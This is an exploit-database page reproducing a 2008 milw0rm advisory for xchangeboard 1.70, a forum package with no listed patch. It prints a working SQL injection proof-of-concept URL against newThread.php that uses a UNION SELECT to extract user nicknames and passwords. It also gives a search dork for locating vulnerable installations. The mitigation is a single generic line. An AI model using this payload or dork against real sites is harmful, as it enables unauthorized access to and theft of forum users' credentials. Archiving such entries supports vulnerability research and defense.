header-logo
Suggest Exploit
vendor:
xchangeboard
by:
haZl0oh
7.5
CVSS
HIGH
Credentials saved as cookies
89
CWE
Product Name: xchangeboard
Affected Version From: 1.7
Affected Version To: 1.7
Patch Exists: NO
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2008

xchangeboard 1.70 final and lower

xchangeboard 1.70 final and lower is vulnerable to an SQL injection vulnerability. An attacker can exploit this vulnerability to gain access to user credentials like passwords which are saved as cookies. The PoC for this exploit is http://site.com/path/newThread.php?boardID=+999999%20union%20select%20email,concat_ws(0x3a,nick,substring(password,1,100)),email,email,email%20from%20user/*

Mitigation:

Ensure that user input is properly sanitized and validated before being used in an SQL query.
Source

Exploit-DB raw data:

######################
 #
 # xchangeboard 1.70 final and lower
 #
 #
 ######################
 #
 #Bug by: haZl0oh #
 #Dork: "Powered by xchangeboard"
 #info:you have to be an registered user to use it like this !!!!
 #there should be a lot more vulns there ;)
 #
 #
 #
 # credentials like passwords are saved as cookies .... :D
 ##
 ###
 ##
 #
 #PoC:
 #http://site.com/path/newThread.php?boardID=+999999%20union%20select%20email,concat_ws(0x3a,nick,substring(password,1,100)),email,email,email%20from%20user/*
 #
 # #
 #
 #
 #######################
 #
 #Greetz to h0yt3r ,everiZzel & Mastermaefju
 #
 #######################
#######################

# milw0rm.com [2008-07-02]

Navigation

Suggest Exploit

Services By CQR